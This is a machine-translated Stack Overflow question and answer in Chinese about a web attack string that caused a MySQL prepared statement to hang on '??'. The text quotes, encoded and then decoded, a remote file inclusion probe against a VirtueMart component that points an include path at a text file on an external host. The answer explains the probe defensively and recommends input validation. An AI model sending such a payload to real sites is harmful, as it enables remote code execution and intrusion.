我最近对我的网站发了攻击,攻击者尝试通过添加以下字符串来更改我的SQL语句之一
%2f%2fcomponents%2fcom%5fvirtuemart%2fshow%5fimage%5fin%5fimgtag%2ephp%3fmosConfig%5fabsolute%5fpath%3dhttp%3a%2f%2fwww%2ekwangsung%2ees%2ekr%2f%2fUserFiles%2fshirohige%2fzfxid%2etxt
值。
无论如何,我都不使用PHP或任何碰巧的东西,但是%3f%3f引起了一个问题:在MySQL prepare语句调用中,double挂起。
其他人曾经遇到过这个问题吗?我检查了MySQL网站,但没有找到任何东西。
最佳答案
这不是SQL注入攻击,它似乎是一个探查您是否容易受到某种“ virtuemart”漏洞的攻击的工具。
//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt
无论使用哪种语言,都不应将任意GET数据传递给SQL查询。您需要实现某种类型的服务器端验证,并确保查询正确地转义了所有用户定义的输入。
关于mysql - 最近的网络攻击和使用??在准备好的MySQL语句中,我们在Stack Overflow上找到一个类似的问题:https://stackoverflow.com/questions/1258117/